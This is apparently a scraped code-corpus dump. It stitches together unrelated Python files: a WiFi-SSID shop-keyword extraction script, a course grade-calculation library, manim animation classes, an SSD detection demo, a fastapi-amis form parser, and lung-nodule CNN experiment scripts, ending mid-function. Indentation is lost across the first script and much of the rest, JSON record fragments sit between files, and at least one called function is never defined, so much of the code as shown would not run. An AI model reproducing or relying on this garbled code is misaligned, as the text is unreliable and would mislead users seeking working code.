# Extract strings that occur with high frequency across different shops' keyword lists
def find_unused_fre_key(dict_key):
list_fre = []
for key,value in dict_key.items():
for i in range(len(value)):
list_fre.append(value[i])
a = {}
list_fre_key = []
for i in list_fre:
if list_fre.count(i)>1:
a[i] = list_fre.count(i)
for key,value in a.items():
list_fre_key.append(key)
print(list_fre_key)
return list_fre_key
# Set difference of two lists: members of listB that are not in listA
def diff(listA,listB):
retD = list(set(listB).difference(set(listA)))
return retD
# Common router brand names and other meaningless words
list_unused = ['TP-LINK','MERCURY','FAST','Tenda','Xiaomi','PHICOMM','D-Link','TPGuest','dlink','ChinaNet','CMCC','CU','B-LINK','USER','360WiFi',
'客厅的父母乐','GAOKE','0x','dlink','netcore','netgear','androidap','d-link_dir-612','@ffan']
if __name__ == '__main__':
DB_FN = 'F:\\wifi3.txt'
with open(DB_FN, 'r') as f:
data = f.readlines()
dict_shop_ssid = {}
for line in data:
l = line.strip().split('|')
        ssid = l[0].strip().lower().replace(".","").replace(" ","").replace("_","").replace("-","") # lowercase and strip spaces, '.', '_', '-'
#print ssid
shop = l[1]
cnt = l[2]
#print shop
if shop in dict_shop_ssid.keys():
temp_dict = dict_shop_ssid[shop]
if ssid in temp_dict.keys():
temp_dict[ssid] = int(temp_dict[ssid]) + int(cnt)
else :
temp_dict[ssid] = cnt
else:
temp = {}
temp[ssid] = cnt
dict_shop_ssid[shop] = temp
    # output dict {shop1:{ssid1:cnt1,ssid2:cnt2,...}, shop2:...}
    # for key, value in dict_shop_ssid.iteritems():
    #     print key,value
    # First pass: roughly computed keywords per shop
print 'first output result:'
dict_key_all = {}
for shop in dict_shop_ssid.keys():
temp_dict = dict_shop_ssid[shop]
temp_dict_keys = extract_keywords(temp_dict,2)
dict_key_all[shop] = temp_dict_keys
print shop,dict_key_all[shop]
    # output dict {shop1:[ssid1,ssid2,...], shop2:...}
# print 'output dict_key_all:'
# for key, value in dict_key_all.iteritems():
# print key,value
    # Second pass: filter out keywords that are frequent across shops
    list_fre_keys = find_unused_fre_key(dict_key_all) # keywords that are frequent across shops
for key,value in dict_key_all.items():
        dict_key_all[key] = diff(list_fre_keys,dict_key_all[key]) # drop the cross-shop high-frequency keywords from dict_key_all[key]
    # Third pass: filter out router brand names
    # list_unused: common router names, lowercased
for i in range(len(list_unused)):
list_unused[i] = list_unused[i].lower().replace(".","").replace(" ","").replace("_","").replace("-","")
for key,value in dict_key_all.items():
        dict_key_all[key] = diff(list_unused,dict_key_all[key]) # drop the common router names from dict_key_all[key]
    # dict_key_all is the final result
    # output dict {shop1:[ssid1,ssid2,...], shop2:...}
print 'output dict_key_all:'
for key, value in dict_key_all.iteritems():
print key,value
print 'save result to a txt:'
fileObject = open('keywords_1.txt','w')
for key in dict_key_all:
fileObject.write(key)
fileObject.write('|')
fileObject.write(str(dict_key_all[key]))
fileObject.write('\n')
fileObject.close()
``` |
{
"source": "61c-teach/TotalCoursePoints",
"score": 3
} |
#### File: TotalCoursePoints/TotalCoursePoints/group.py
```python
from .assignment import Assignment, StudentAssignmentData
from .student import Student
from typing import List, Callable
class Group(Assignment):
"""
This class will allow you to group together different assignments in one assignment.
Score merger will take in all the Student Assignment Datas for a single student and generate a StudentAssignmentData from it.
"""
def __init__(self, id: str, category, score_merger: Callable[[List[StudentAssignmentData]], StudentAssignmentData], assignments: List[Assignment]=[], *args, **kwargs):
self.assignments = assignments
self.score_merger = score_merger
super().__init__(id, category, *args, **kwargs)
def has_assignment(self, assignment: Assignment):
        return assignment in self.assignments
def add_assignment(self, assignment: Assignment):
if self.has_assignment(assignment):
raise ValueError(f"Group already contains the assignment: {assignment}")
self.assignments.append(assignment)
def load(self):
tmp = f": {self.name}" if self.name is not None else ""
load_str = f"Loading group {self.id}{tmp}..."
load_str_done = load_str + "Done!"
print(load_str)
for assignment in self.assignments:
assignment.load()
self.data_loaded = self.data_loaded or assignment.data_loaded
seen_students = set()
for assignment in self.assignments:
scores = assignment.data.values()
for _score in scores:
if not isinstance(_score, list):
_score = [_score]
for score in _score:
student = (score.name, score.sid, score.email)
if student in seen_students:
continue
seen_students.add(student)
sid = student[1]
email = student[2]
std = Student(student[0], sid, email)
asmts = []
group_msg = "Groupped Assignments:\n" + ("~" * 20) + "\n"
for a in self.assignments:
sad = a.get_student_data(std)
asmts.append(sad)
group_msg += sad.get_str().replace("*", ".").replace("-", "_")
group_msg += "\n" + ("~" * 20) + "\n"
new_sad = self.score_merger(asmts)
new_sad.assignment = self
self.all_scores.append(new_sad.score)
self.scores.append(new_sad.score)
if not isinstance(new_sad, StudentAssignmentData):
raise ValueError("Score merger function must return a StudentAssignmentData object")
new_sad.personal_comment = group_msg + new_sad.personal_comment
                    dat = self.data.get(sid)
                    if dat is None:
                        self.data[sid] = new_sad
                    elif isinstance(dat, list):
                        dat.append(new_sad)
                    else:
                        self.data[sid] = [dat, new_sad]
                    edat = self.edata.get(email)
                    if edat is None:
                        self.edata[email] = new_sad
                    elif isinstance(edat, list):
                        edat.append(new_sad)
                    else:
                        self.edata[email] = [edat, new_sad]
print(load_str_done)
```
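The `score_merger` callable that `Group` expects is only characterized implicitly by `load()` above: it receives a list of `StudentAssignmentData` and must return one. A minimal hypothetical sketch, relying only on the `score` attribute that `load()` itself reads from the returned object, could keep the best-scoring grouped assignment:
```python
def best_score_merger(assignment_datas):
    # assignment_datas: list of StudentAssignmentData, one per grouped assignment.
    # Group.load() re-points the returned record's .assignment to the Group and
    # prepends the per-assignment breakdown to its personal comment.
    return max(assignment_datas, key=lambda sad: sad.score)
```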
#### File: TotalCoursePoints/TotalCoursePoints/student.py
```python
from __future__ import annotations
import json
from . import GradeBins, PNP
from typing import Union
class Student:
def __init__(self, name: str, sid: str, email: str, active_student: bool=True, grade_status: str="GRD", extensionData: dict={}, secret: str=None, incomplete: bool=False):
self.name = name
self.sid = str(sid)
self.email = email
self.active_student = active_student
self.categoryData = {}
self.extensionData = extensionData
self.incomplete = incomplete
self.grade_status = grade_status
self.override_score = None
# FIXME Parse extension data!
if not extensionData:
self.extensionData = {}
if isinstance(self.extensionData, str):
try:
self.extensionData = json.loads(self.extensionData)
except Exception as exc:
import traceback
traceback.print_exc()
print(exc)
self.extensionData = {}
self.secret = secret
self.reset_comment()
def set_override_score(self, score):
# Set raw score of student. If set to None, it will be ignored.
if not (isinstance(score, (int, float)) or score is None):
raise ValueError("Score must be int, float, or None")
self.override_score = score
def append_comment(self, *args, sep=' ', end='\n'):
self.personal_comment += sep.join(args) + end
def reset_comment(self):
self.personal_comment = ""
def get_comment(self):
return self.personal_comment
def is_for_grade(self):
return self.grade_status == "GRD" and not self.incomplete
def __repr__(self):
return self.__str__()
def __str__(self):
return "<Name: {}, SID: {}, Email: {}, Secret: {}, Total Points: {}>".format(self.name, self.sid, self.email, self.secret, str(self.total_points()))
def is_auth(self, sid: str, secret: str) -> bool:
return str(sid) == self.sid and (self.secret == secret or self.secret is None)
def add_assignment_data(self, data: StudentAssignmentData):
cat = data.assignment.category.name
if cat not in self.categoryData:
self.categoryData[cat] = []
self.categoryData[cat].append(data)
def add_category_data(self, data: StudentCategoryData):
self.categoryData[data.category.name] = data
def total_points(self, with_hidden=False, c=None):
if self.override_score is not None:
return self.override_score
ignore_categories = set([])
if c is not None:
ignore_categories = c.get_ignore_category()
tp = 0
for c in self.categoryData.values():
if c.category.name in ignore_categories:
continue
tp += c.get_total_score(with_hidden=with_hidden)
return tp
def get_assignment_data(self, assignment: Assignment) -> Assignment:
cat = self.categoryData.get(assignment.category.name)
if cat is None:
return None
return cat.get_assignment_data(assignment)
# for a in cat:
# if a.assignment == assignment:
# return a
# return None
def get_category_data(self, category: Union[Category, str]) -> Category:
if isinstance(category, Category):
category = category.name
return self.categoryData.get(category)
def get_total_points_with_class(self, c, with_hidden=False) -> float:
tp = c.get_total_possible()
if tp == 0:
tp = 1
return self.total_points(c=c, with_hidden=with_hidden) + (c.get_raw_additional_pts() * (c.get_total_possible(only_inputted=True) / tp))
def get_grade(self, c, score=None, with_hidden=False, ignore_pnp=False) -> str:
if self.incomplete:
return "I"
if score is None:
score = self.get_total_points_with_class(c, with_hidden=with_hidden)
if not ignore_pnp and not self.is_for_grade() and self.grade_status in PNP.PNP_Types.keys():
pnp = PNP.PNP_Types[self.grade_status]
if c.grade_bins.is_passing(score, self.grade_status):
return pnp.pass_value
else:
return pnp.not_pass_value
b = c.grade_bins.in_bin(score)
return b.id
def get_approx_grade_id(self, c, score=None, with_hidden=False, ignore_pnp=False) -> str:
if self.incomplete:
return "I"
if score is None:
score = self.get_total_points_with_class(c, with_hidden=with_hidden)
cur_score = score
cur_max_score = c.get_total_possible(only_inputted=True)
if not ignore_pnp and not self.is_for_grade() and self.grade_status in PNP.PNP_Types.keys():
pnp = PNP.PNP_Types[self.grade_status]
score = c.grade_bins.relative_score(cur_score, cur_max_score)
if c.grade_bins.is_passing(score, self.grade_status):
return pnp.pass_value
else:
return pnp.not_pass_value
b = c.grade_bins.relative_bin(cur_score, cur_max_score)
return b.id
def get_approx_grade(self, c, show_exact_grade: bool=True) -> str:
cur_score = self.get_total_points_with_class(c)
cur_max_score = c.get_total_possible(only_inputted=True)
b = c.grade_bins.relative_bin(cur_score, cur_max_score)
return f"You are on track for a(n) {b.id} based off of the {cur_max_score} points entered."
def apply_extensions(self):
for ext_cat_key, value in self.extensionData.items():
cat = self.categoryData.get(ext_cat_key)
if cat is None:
continue
for ext_assign, value in value.items():
assign = cat.get_assignment_data(ext_assign)
if assign is None:
continue
assign.extension_time = value
def apply_slip_time(self):
for cat in self.categoryData.values():
cat.apply_slip_time()
def drop_lowest_assignments(self):
for cat in self.categoryData.values():
cat.drop_lowest_assignments()
def main_results_str(self, c, include_rank=False):
grade_info = self.get_grade(c)
if not c.all_inputted():
grade_info += "\n" + self.get_approx_grade(c)
rank_str = ""
if include_rank:
rank, total = c.get_student_ranking(self)
rank_str = f"Rank: {rank} / {total}\n"
personal_comment = self.get_comment()
if len(personal_comment) > 0:
personal_comment = "\n\n" + personal_comment
return f"{c.get_welcome()}{c.get_comment()}SID: {self.sid}\nemail: {self.email}\n\nTotal Points: {self.get_total_points_with_class(c)} / {c.get_total_possible()}\n{rank_str}Grade: {grade_info}{personal_comment}"
def dump_data(self, results_file: str, data: dict) -> None:
jsondata = json.dumps(data, ensure_ascii=False)
with open(results_file, "w") as f:
f.write(jsondata)
def dump_str(self, c, class_dist: bool=False, class_stats_all: bool=False, class_stats_graded: bool=False, include_rank=False):
tests = []
results = {
"score":self.get_total_points_with_class(c),
"tests":tests
}
if c.gs_leaderboard:
results["leaderboard"] = {
"name": "Total Score",
"value": results["score"]
}
tests.append({"name":"Total", "output": self.main_results_str(c, include_rank=include_rank)})
if class_dist or class_stats_all or class_stats_graded:
stats_str = ""
if class_stats_graded:
title = "Class Statistics (Graded):"
stats_str += f"{title}\n" + ("-" * len(title)) + "\n"
stats_str += c.get_class_points_stats_str()
stats_str += "\n"
if class_stats_all:
title = "Class Statistics (All):"
stats_str += f"{title}\n" + ("-" * len(title)) + "\n"
stats_str += c.get_class_points_stats_str(only_for_grade=False)
stats_str += "\n"
if class_dist:
if class_stats_all or class_stats_graded:
stats_str += ("_" * 35) + ("\n" * 2)
stats_str += c.get_class_statistics_str()
tests.append({"name": "Class Stats", "output": stats_str})
for cat in self.categoryData.values():
if not cat.is_hidden():
score = cat.get_total_score(ignore_not_for_points=True)
tests.append({
"name": cat.category.name,
"output": cat.get_str(score=score),
"score": round(score, 4),
"max_score": round(cat.category.get_total_possible(), 4)
})
return results
def dump_result(self, c, class_dist: bool=False, class_stats_all: bool=False, class_stats_graded: bool=False, include_rank=False, results_file:str="/autograder/results/results.json"):
results = self.dump_str(c, class_dist=class_dist, class_stats_all=class_stats_all, class_stats_graded=class_stats_graded, include_rank=include_rank)
self.dump_data(results_file, results)
def get_raw_data(self, c, approx_grade: bool=False, with_hidden=True):
score = self.get_total_points_with_class(c, with_hidden=with_hidden)
data = {
"name": self.name,
"sid": self.sid,
"email": self.email,
"grade": self.get_approx_grade_id(c, score=score, with_hidden=with_hidden) if approx_grade else self.get_grade(c, with_hidden=with_hidden),
"score": score,
"Grading Basis": self.grade_status
}
for cat in self.categoryData.values():
for assign in cat.assignments_data:
data[f"{cat.category.name}/{assign.assignment.id}"] = assign.get_course_points()
return data
from .assignment import Assignment, StudentAssignmentData
from .category import Category, StudentCategoryData
``` |
{
"source": "61smiling/algorithm-stone",
"score": 2
} |
#### File: animations/src/algo_logo.py
```python
from manimlib import *
class AlgoLogoShield(VMobject):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def init_points(self):
start = ORIGIN
self.append_points(Line([3., -1., 0.], [0.0, 0., 0.]).get_points())
self.append_points(Line([0.0, 0., 0.], [-3., -1., 0.]).get_points())
v = CubicBezier(
[-3, -1, 0],
[-3.06, -3.51, 0],
[-2.14, -5.19, 0],
[0, -6.5, 0],
)
v2 = CubicBezier(
[0, -6.5, 0],
[2.14, -5.19, 0],
[3.06, -3.51, 0],
[3, -1, 0],
)
self.append_points(v.get_points())
self.append_points(v2.get_points())
self.center()
class AlgoLogo(VGroup):
def __init__(self, *vmobjects, **kwargs):
super().__init__(*vmobjects, **kwargs)
self.add(AlgoLogoShield(fill_color="#4386f7", fill_opacity = 1, stroke_width=0).scale(1.06),
AlgoLogoShield(fill_color="#fff", fill_opacity = 1, stroke_width=0, stroke_opacity=0).scale(1.00),
AlgoLogoShield(fill_color="#4386f7", fill_opacity = 1, stroke_width=0, stroke_opacity=0).scale(0.96))
text = Text("A", font="Caladea").scale(5.4)
text.shift(UP*1.2)
self.add(text)
vertices = [
[-3.5, -3.75, 0],
[-3.25, -4.25, 0],
[-3.5, -4.75, 0],
[3.5, -4.75, 0],
[3.25, -4.25, 0],
[3.5, -3.75, 0],
]
back_flag = Polygon(*vertices, fill_color="#4386f7", fill_opacity = 1, stroke_width=0)
back_flag.shift(UP*3.25)
self.add(back_flag)
fore_flag = Rectangle(6, 1, fill_color="#4386f7", fill_opacity = 1, stroke_color="#fff", stroke_width=2, stroke_opacity=1)
fore_flag.shift(DOWN*1.2)
self.add(fore_flag)
self.center()
```
#### File: animations/src/algo_trie.py
```python
from manimlib import *
import networkx as nx
from .algo_vgroup import *
from .algo_node import *
from .algo_tree import *
import numpy
class AlgoTrieTreeNode(AlgoTreeNode):
def __init__(self, tree):
super().__init__(tree)
self.end = False
self.tree = tree
self.color = TEAL_D
self.c = numpy.empty(26, dtype=object)
class AlgoTrieTree(AlgoTree):
def __init__(self, scene, data=[], **kwargs):
self.scene = scene
super().__init__(**kwargs)
# empty
self.root = AlgoTrieTreeNode(self)
self.root.setText("*")
self.ctx.wait_time = 0.5
def add_word(self, word):
self.scene.show_message("插入单词%s"%(word))
p = self.root
nodes = []
for ch in word:
index = ord(ch) - ord('a')
if p.c[index] == None:
p.c[index] = AlgoTrieTreeNode(self)
p.c[index].setText(ch)
self.update_tree()
p = p.c[index]
node = self.get_node(p.id)
old_color = node.get_color()
            if node.get_color() != RED:
                self.scene.play(node.set_color, RED, time=0.5)
nodes.append((node, old_color))
p.end = True
node = self.get_node(p.id)
a = []
for n in nodes:
a.append(ApplyMethod(n[0].set_color, n[1]))
self.scene.play(*a, time=0.5)
node.set_sub("$").set_color(RED).scale(0.5).shift(DR/8)
# overwrite
def calc_tree_data(self):
q = []
q.append(self.root)
nodes = []
edges = []
while len(q)>0:
p = q.pop(0)
self.check_node(p)
nodes.append(p)
for i in range(0, 26):
child = p.c[i]
if child:
self.check_node(child)
self.check_edge(p, child)
edges.append((p.id, child.id))
q.append(child)
return nodes, edges
def query(self, word):
self.scene.show_message("查询单词%s"%(word))
p = self.root
nodes = []
for ch in word:
index = ord(ch) - ord('a')
if not p.c[index]:
return False
p = p.c[index]
node = self.get_node(p.id)
old_color = node.get_color()
            if node.get_color() != RED:
                self.scene.play(node.set_color, RED, time=0.5)
nodes.append((node, old_color))
a = []
for n in nodes:
a.append(ApplyMethod(n[0].set_color, n[1]))
self.scene.play(*a, time=0.5)
        if p.end:
            self.scene.show_message("End marker $ found, query succeeded (%s)" % (word))
        else:
            self.scene.show_message("No end marker $, query failed (%s)" % (word))
return p.end
``` |
{
"source": "625135449/SSD-Pytorch",
"score": 2
} |
#### File: SSD-Pytorch/demo/live_img.py
```python
from __future__ import print_function
import torch
from torch.autograd import Variable
import cv2
import time
# from imutils.video import FPS, WebcamVideoStream
import argparse
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from data import BaseTransform, VOC_CLASSES as labelmap
from ssd import build_ssd
# Set the absolute path of the trained model below; also change the image path (around line 50) and the number of classes (around line 60)
parser = argparse.ArgumentParser(description='Single Shot MultiBox Detection')
parser.add_argument('--weights', default="/media/vs/qi/data/ssd.pytorch/weights/ssd_VOC_500.pth",
type=str, help='Trained state_dict file path')
parser.add_argument('--cuda', default=False, type=bool,
help='Use cuda in live demo')
args = parser.parse_args()
COLORS = [(255, 0, 0), (0, 255, 0), (0, 0, 255)]
FONT = cv2.FONT_HERSHEY_SIMPLEX
def cv2_demo(net, transform):
def predict(frame):
height, width = frame.shape[:2]
x = torch.from_numpy(transform(frame)[0]).permute(2, 0, 1)
x = Variable(x.unsqueeze(0))
y = net(x) # forward pass
detections = y.data
# scale each detection back up to the image
scale = torch.Tensor([width, height, width, height])
for i in range(detections.size(1)):
j = 0
while detections[0, i, j, 0] >= 0.6:
pt = (detections[0, i, j, 1:] * scale).cpu().numpy()
cv2.rectangle(frame,
(int(pt[0]), int(pt[1])),
(int(pt[2]), int(pt[3])),
COLORS[i % 3], 2)
cv2.putText(frame, labelmap[i - 1], (int(pt[0]), int(pt[1])),
FONT, 1, (255, 0, 255), 2, cv2.LINE_AA)
j += 1
return frame
frame = cv2.imread('/media/vs/qi/data/ssd.pytorch/doc/helmet01.jpg')
frame = predict(frame)
window_name = 'Object detector'
cv2.namedWindow(window_name, 0)
cv2.resizeWindow(window_name, 640, 640)
cv2.imshow(window_name, frame)
# cv2.imshow('frame', frame)
if __name__ == '__main__':
    net = build_ssd('test', 300, 3) # initialize SSD; 3 is the number of classes
net.load_state_dict(torch.load(args.weights))
transform = BaseTransform(net.size, (104 / 256.0, 117 / 256.0, 123 / 256.0))
cv2_demo(net.eval(), transform)
# Press any key to close the image
cv2.waitKey()
# cleanup
cv2.destroyAllWindows()
``` |
{
"source": "625412505/fastapi_amis_admin",
"score": 2
} |
#### File: fastapi_amis_admin/amis_admin/parser.py
```python
import datetime
from pydantic import Json
from pydantic.fields import ModelField
from pydantic.utils import smart_deepcopy
from fastapi_amis_admin.amis.components import FormItem, Remark, Validation, InputNumber, TableColumn
from fastapi_amis_admin.models.enums import Choices
class AmisParser():
def __init__(self, modelfield: ModelField):
self.modelfield = modelfield # read only
@property
def label(self):
return self.modelfield.field_info.title or self.modelfield.name
@property
def remark(self):
return Remark(
content=self.modelfield.field_info.description) if self.modelfield.field_info.description else None
def as_form_item(self, set_deafult: bool = False, is_filter: bool = False) -> FormItem:
# sourcery no-metrics
kwargs = {}
formitem = self.modelfield.field_info.extra.get(['amis_form_item', 'amis_filter_item'][is_filter])
if formitem is not None:
formitem = smart_deepcopy(formitem)
if isinstance(formitem, FormItem):
pass
elif isinstance(formitem, dict):
kwargs = formitem
formitem = FormItem(**kwargs) if kwargs.get('type') else None
elif isinstance(formitem, str):
formitem = FormItem(type=formitem)
else:
formitem = None
if formitem is not None:
pass
elif self.modelfield.type_ == str:
kwargs['type'] = 'input-text'
elif issubclass(self.modelfield.type_, Choices):
kwargs.update({
'type': 'select',
'options': [{'label': l, 'value': v} for v, l in self.modelfield.type_.choices],
'extractValue': True,
'joinValues': False,
})
if not self.modelfield.required:
kwargs['clearable'] = True
elif issubclass(self.modelfield.type_, bool):
kwargs['type'] = 'switch'
elif is_filter:
if issubclass(self.modelfield.type_, datetime.datetime):
kwargs['type'] = 'input-datetime-range'
kwargs['format'] = 'YYYY-MM-DD HH:mm:ss'
                # add quick-select range tags such as 'today' to the filter's DateTimeRange
kwargs['ranges'] = "today,yesterday,7daysago,prevweek,thismonth,prevmonth,prevquarter"
elif issubclass(self.modelfield.type_, datetime.date):
kwargs['type'] = 'input-date-range'
kwargs['format'] = 'YYYY-MM-DD'
elif issubclass(self.modelfield.type_, datetime.time):
kwargs['type'] = 'input-time-range'
kwargs['format'] = 'HH:mm:ss'
else:
kwargs['type'] = 'input-text'
elif issubclass(self.modelfield.type_, int):
formitem = InputNumber(precision=0, validations=Validation(isInt=True))
elif issubclass(self.modelfield.type_, float):
formitem = InputNumber(validations=Validation(isFloat=True))
elif issubclass(self.modelfield.type_, datetime.datetime):
kwargs['type'] = 'input-datetime'
kwargs['format'] = 'YYYY-MM-DDTHH:mm:ss'
elif issubclass(self.modelfield.type_, datetime.date):
kwargs['type'] = 'input-date'
kwargs['format'] = 'YYYY-MM-DD'
elif issubclass(self.modelfield.type_, datetime.time):
kwargs['type'] = 'input-time'
kwargs['format'] = 'HH:mm:ss'
elif issubclass(self.modelfield.type_, Json):
kwargs['type'] = 'json-editor'
else:
kwargs['type'] = 'input-text'
formitem = formitem or FormItem(**kwargs)
if not is_filter:
if self.modelfield.field_info.max_length:
formitem.maxLength = self.modelfield.field_info.max_length
if self.modelfield.field_info.min_length:
formitem.minLength = self.modelfield.field_info.min_length
formitem.required = self.modelfield.required
if set_deafult and self.modelfield.default is not None:
formitem.value = self.modelfield.default
formitem.name = self.modelfield.alias
formitem.label = formitem.label or self.label
formitem.labelRemark = formitem.labelRemark or self.remark
return formitem
def as_table_column(self) -> TableColumn:
kwargs = {}
column = self.modelfield.field_info.extra.get('amis_table_column')
if column is not None:
column = smart_deepcopy(column)
if isinstance(column, TableColumn):
pass
elif isinstance(column, dict):
kwargs = column
column = TableColumn(**kwargs) if kwargs.get('type') else None
elif isinstance(column, str):
column = TableColumn(type=column)
else:
column = None
if column is not None:
pass
elif self.modelfield.type_ == str:
pass
elif issubclass(self.modelfield.type_, bool):
kwargs['type'] = 'switch'
elif issubclass(self.modelfield.type_, datetime.datetime):
kwargs['type'] = 'datetime'
elif issubclass(self.modelfield.type_, datetime.date):
kwargs['type'] = 'date'
elif issubclass(self.modelfield.type_, datetime.time):
kwargs['type'] = 'time'
elif issubclass(self.modelfield.type_, Choices):
kwargs['type'] = 'mapping'
kwargs['map'] = dict(self.modelfield.type_.choices)
column = column or TableColumn(**kwargs)
column.name = self.modelfield.alias
column.label = column.label or self.label
column.remark = column.remark or self.remark
column.sortable = True
return column
``` |
{
"source": "627oldcat/CNN_Virus",
"score": 3
} |
#### File: 627oldcat/CNN_Virus/voting.py
```python
import collections
def get_final_result(labels,probs1,loc,probs2):
valid_labels=[]
valid_loc=[]
for i in range(len(probs1)):
if float(probs1[i])>=0.9:
valid_labels.append(labels[i])
valid_loc.append(loc[i])
if len(valid_labels)==0:
return "187","10"
else:
d_count={}
for i in range(len(valid_labels)):
if valid_labels[i] in d_count:
d_count[valid_labels[i]].append(valid_loc[i])
else:
d_count[valid_labels[i]]=[]
d_count[valid_labels[i]].append(valid_loc[i])
counter=collections.Counter(valid_labels)
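        # most_common(1) returns [(label, count)]; take the label with the most votes among high-confidence reads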
true_label=counter.most_common(1)[0][0]
counter_loc=collections.Counter(d_count[true_label])
true_loc=counter_loc.most_common(1)[0][0]
return true_label,true_loc
``` |
{
"source": "628014/local-global-master",
"score": 2
} |
#### File: 628014/local-global-master/experiments.py
```python
import torch
from torch.backends import cudnn
from kflod import kfold
import numpy as np
import random
from torch.optim.adam import Adam
from resnet_attn import *
from torchvision.models.resnet import resnet50, resnet18
from torchvision.models.densenet import densenet121
from preprocessing import get_dataset3d
import sys
def reset_rand():
seed = 1000
T.manual_seed(seed)
T.cuda.manual_seed(seed)
np.random.seed(seed)
random.seed(seed)
# AllAtn network: 86.18%
def expAllAtn(data_path):
reset_rand()
def model_opt():
model = AllAtn()
optm = Adam(model.parameters())
return model, optm
kfold(data_path,
256,
50,
model_optimizer=model_opt,
loss=nn.BCELoss(),
name='AllAtn',
device='cuda:0',
deterministic=True
)
# Basic ResNet network: 93.42%
def expBasicResnet(data_path):
reset_rand()
def model_opt():
model = BasicResnet()
optm = Adam(model.parameters())
return model, optm
kfold(data_path,
256,
50,
model_optimizer=model_opt,
loss=nn.BCELoss(),
name='BasicResnet',
device='cuda:0',
deterministic=True
)
# Network defined in the paper: 95.62%
# We propose Residual Blocks with 3x3 kernels for local feature extraction and Non-Local Blocks for global features.
# A Non-Local Block can extract global features without a large number of parameters; its key idea is to relate features at different positions of the same feature map.
def expLocalGlobal(data_path):
reset_rand()
def model_opt():
model = LocalGlobalNetwork()
optm = Adam(model.parameters())
return model, optm
kfold(data_path,
64,
50,
model_optimizer=model_opt,
loss=nn.BCELoss(),
name='LocalGlobalNetwork',
device='cuda:0',
deterministic=True
)
# AllAtnBig network: 85.89%
def expAllAtnBig(data_path):
reset_rand()
def model_opt():
model = AllAtnBig()
optm = Adam(model.parameters())
return model, optm
kfold(data_path,
256,
50,
model_optimizer=model_opt,
loss=nn.BCELoss(),
name='AllAtnBig',
device='cuda:0',
deterministic=True
)
# ResNet-50 network: 86.82%
def expResnetTrans(data_path):
reset_rand()
def model_opt():
model = resnet50(pretrained=True)
model.avgpool = nn.AdaptiveAvgPool2d((1, 1))
model.fc = nn.Sequential(
nn.Linear(model.fc.in_features, 1),
nn.Sigmoid()
)
optm = Adam(model.fc.parameters())
return model, optm
kfold(data_path,
256,
50,
model_optimizer=model_opt,
loss=nn.BCELoss(),
name='ResnetTrans',
device='cuda:0',
deterministic=True,
dataset_func=get_dataset3d
)
# DenseNet-121 network: 92.50%
def expDensenetTrans(data_path):
reset_rand()
def model_opt():
model = densenet121(pretrained=True)
# model.avgpool = nn.AdaptiveAvgPool2d((1, 1))
model.classifier = nn.Sequential(
nn.Linear(model.classifier.in_features, 1),
nn.Sigmoid()
)
optm = Adam(model.classifier.parameters())
return model, optm
kfold(data_path,
256,
50,
model_optimizer=model_opt,
loss=nn.BCELoss(),
name='DensenetTrans',
device='cuda:0',
deterministic=True,
dataset_func=get_dataset3d
)
# ResNet-18 network: 86.41%
def expResnet18Trans(data_path):
reset_rand()
def model_opt():
model = resnet18(pretrained=True)
model.avgpool = nn.AdaptiveAvgPool2d((1, 1))
model.fc = nn.Sequential(
nn.Linear(model.fc.in_features, 1),
nn.Sigmoid()
)
optm = Adam(model.fc.parameters())
return model, optm
kfold(data_path,
256,
50,
model_optimizer=model_opt,
loss=nn.BCELoss(),
name='Resnet18Trans',
device='cuda:1',
deterministic=True,
dataset_func=get_dataset3d
)
def print_error():
print(f'python <model_name> <data_path>')
print('here is a list of experiments names:')
for name in experiments.keys():
print(name)
if __name__ == '__main__':
cudnn.benchmark = True
torch.backends.cudnn.deterministic = False
torch.backends.cudnn.enabled = True
experiments = {
'Resnet18Trans': expResnet18Trans,
'ResnetTrans': expResnetTrans,
'AllAtnBig': expAllAtnBig,
'LocalGlobal': expLocalGlobal,
'BasicResnet': expBasicResnet,
'AllAtn': expAllAtn,
'DensenetTrans': expDensenetTrans
}
if len(sys.argv) < 3:
print('Error, we expect two arguments')
print_error()
else:
exp_name = sys.argv[1]
data_path = sys.argv[2]
if exp_name not in experiments:
print('Unknow experiment name')
print_error()
else:
experiments[exp_name](data_path)
    # Run from the command line, e.g.: python experiments.py LocalGlobal E:\课程学习\大二\大二下机器学习\小项目\肺分类\lidc_img
```
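The `LocalGlobalNetwork` used above is defined in `resnet_attn`, which is not included in this excerpt. As a rough illustration of the 'global' half described in the comments, here is a minimal embedded-Gaussian Non-Local Block sketch in PyTorch; the class name and the channel-reduction factor are illustrative assumptions, not the repository's actual implementation:
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class NonLocalBlock2d(nn.Module):
    # Embedded-Gaussian non-local block: every spatial position attends to every
    # other position of the same feature map, adding global context with few parameters.
    def __init__(self, channels, reduction=2):
        super().__init__()
        inter = max(channels // reduction, 1)
        self.theta = nn.Conv2d(channels, inter, kernel_size=1)
        self.phi = nn.Conv2d(channels, inter, kernel_size=1)
        self.g = nn.Conv2d(channels, inter, kernel_size=1)
        self.out = nn.Conv2d(inter, channels, kernel_size=1)
    def forward(self, x):
        b, _, h, w = x.shape
        q = self.theta(x).flatten(2).transpose(1, 2)   # (b, h*w, inter)
        k = self.phi(x).flatten(2)                     # (b, inter, h*w)
        v = self.g(x).flatten(2).transpose(1, 2)       # (b, h*w, inter)
        attn = F.softmax(q @ k, dim=-1)                # pairwise affinities over all positions
        y = (attn @ v).transpose(1, 2).reshape(b, -1, h, w)
        return x + self.out(y)                         # residual connection keeps the local features
```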
#### File: 628014/local-global-master/preprocessing.py
```python
import numpy as np
import torch as t
from torch.utils.data import TensorDataset
from imageio import imread
from PIL import Image, ImageFilter, ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
import pandas as pd
import os
from os import path
img_size = 32
class Augmenter:
def __init__(self, hflip=True, rotate=True, blurring=False):
self.hflip = hflip
self.rotate = rotate
self.blurring = blurring
def extract_mutiview(self, voxel):
x, y, z = voxel.shape
return [voxel[x // 2, :, :],
voxel[:, y // 2, :],
voxel[:, :, z // 2]]
def augment(self, voxel):
for view in self.extract_mutiview(voxel):
im = Image.fromarray(view, mode='L')
yield im
if self.hflip:
yield im.transpose(Image.FLIP_LEFT_RIGHT)
if self.rotate:
yield im.transpose(Image.ROTATE_90)
yield im.transpose(Image.ROTATE_180)
yield im.transpose(Image.ROTATE_270)
if self.blurring:
yield im.filter(ImageFilter.GaussianBlur(1))
def resize(im):
im = im.crop((8, 8, 40, 40))
return im
def generate_dataset(dir):
df = pd.read_csv(dir + '/labels.csv')
df['testing'] = 1
